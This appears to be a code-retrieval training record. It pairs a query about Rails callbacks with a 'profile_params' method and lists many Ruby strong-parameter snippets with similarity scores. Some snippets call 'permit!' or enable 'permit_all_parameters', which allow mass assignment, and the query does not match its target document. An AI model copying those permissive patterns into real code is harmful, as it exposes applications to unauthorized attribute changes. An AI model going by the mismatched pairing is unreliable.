"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def filtering_params\n params.permit(:email)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def url_whitelist; end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.6980957",
"0.6783065",
"0.6747844",
"0.6741468",
"0.67356336",
"0.6592548",
"0.65036845",
"0.64978707",
"0.64825076",
"0.64795035",
"0.64560914",
"0.64397955",
"0.6379666",
"0.6376688",
"0.6366702",
"0.6319728",
"0.6300833",
"0.6300629",
"0.6294277",
"0.6293905",
"0.6291174",
"0.62905735",
"0.6283171",
"0.6242344",
"0.62403613",
"0.6218049",
"0.62143815",
"0.62104696",
"0.61949855",
"0.6178671",
"0.6176147",
"0.6173327",
"0.6163395",
"0.6153005",
"0.6151833",
"0.6147288",
"0.61224324",
"0.6118827",
"0.61075264",
"0.61054534",
"0.6092497",
"0.6080082",
"0.60710967",
"0.60627776",
"0.60219413",
"0.60175914",
"0.60153484",
"0.60107356",
"0.60081726",
"0.60081726",
"0.60013986",
"0.6000165",
"0.59978646",
"0.59936947",
"0.59925723",
"0.5992084",
"0.59796256",
"0.5967569",
"0.5960056",
"0.59589803",
"0.5958441",
"0.5958401",
"0.5952607",
"0.5952406",
"0.5944409",
"0.59391016",
"0.593842",
"0.593842",
"0.5933845",
"0.59312123",
"0.5926475",
"0.59248453",
"0.59179676",
"0.59109294",
"0.59101623",
"0.5908172",
"0.59058356",
"0.5899052",
"0.5897749",
"0.5896101",
"0.58942914",
"0.58939576",
"0.5892063",
"0.5887407",
"0.588292",
"0.58797663",
"0.587367",
"0.58681566",
"0.5868038",
"0.5866578",
"0.58665025",
"0.58655846",
"0.58640826",
"0.5863465",
"0.5862226",
"0.586065",
"0.58581287",
"0.5854443",
"0.5854172",
"0.58507544",
"0.5849934"
] |
0.0
|
-1
|
Use callbacks to share common setup or constraints between actions.
|
def set_profile
@profile = Profile.find(params[:id])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet, only allow the white list through.
|
def profile_params
params.require(:profile).permit(:tipo)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
